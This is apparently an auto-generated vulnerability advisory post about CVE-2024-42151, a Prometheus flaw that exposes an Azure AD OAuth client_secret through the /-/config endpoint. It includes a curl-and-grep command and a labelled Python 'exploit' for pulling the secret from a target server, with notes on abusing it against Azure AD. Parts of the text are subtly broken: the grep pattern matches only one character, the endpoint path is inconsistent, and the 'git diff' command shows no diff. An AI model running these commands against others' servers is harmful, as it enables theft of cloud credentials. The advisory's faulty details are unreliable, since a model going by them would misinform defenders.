Listen to this Post
The vulnerability, identified as CVE-2024-42151, arises in the Azure AD remote write OAuth configuration of Prometheus. The configuration includes a `client_secret` field which was defined as a plain `string` variable instead of the internal `Secret` type. Prometheus uses the internal `/-/config` HTTP API endpoint to serve its current configuration.
This endpoint is designed to automatically redact and obfuscate any fields of the `Secret` type to prevent sensitive information leakage. However, because the `client_secret` was a plain string, the automatic redaction logic that applies to `Secret` types did not trigger for this field.
Consequently, when a user or process performs an HTTP GET request to the `/-/config` endpoint of an affected Prometheus server, the full, unredacted configuration is returned. In this response, the Azure OAuth `client_secret` is exposed in plaintext, readable by any party with legitimate network access to that endpoint or by any malicious actor who has gained system access.
An attacker could then use the leaked `client_id` and `client_secret` to authenticate with Microsoft Azure AD using the OAuth 2.0 Client Credentials flow. Successful authentication allows the attacker to gain unauthorized access to Prometheus’s remote write functionality, potentially exfiltrating sensitive monitoring data, injecting false metrics, or pivoting to other integrated cloud services with the same permissions.
DailyCVE Form
Platform: Prometheus
Version: <3.5.3, 3.6-3.11.2
Vulnerability: OAuth secret leak
Severity: High (7.5 CVSS)
date: 2026-05-04
Prediction: 2026-05-04
Analytics under What Undercode Say:
This vulnerability is a classic example of improper handling of sensitive data in a public API. The failure to use a specialized secret type for a sensitive OAuth credential bypassed the built-in security control. Analysts should prioritize patching, as the `/-/config` endpoint is often exposed for debugging purposes, providing an easy reconnaissance target for lateral movement.
Bash command to check Prometheus version prometheus --version
Bash command to test for exposure (use only on your own systems) curl -s http://<prometheus-host>:9090/-/config | grep -o '"client_secret":"[^"]"'
Git diff showing the fix: changing string to Secret git show --name-only <commit-hash> | grep azuread
Exploit:
An adversary requires network access to the `/config` API. Using a simple HTTP client to retrieve the configuration and extract the secret.
from http.client import HTTPConnection
conn = HTTPConnection("target-prometheus-host", 9090)
conn.request("GET", "/-/config")
resp = conn.getresponse()
data = resp.read()
print(data)
Protection from this CVE:
Upgrade to Prometheus version 3.11.3 or 3.5.3 LTS. As a workaround, migrate authentication to Managed Identity or Workload Identity, which eliminates the need for a client secret. Restrict network access to the `/-/config` endpoint using firewalls or reverse proxies.
Impact:
A successful attack leads to the compromise of the Azure AD OAuth client secret, allowing an attacker to authenticate to Prometheus and any other services trusting that identity. This can result in data breach, service disruption through metric poisoning, and unauthorized access to cloud resources.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
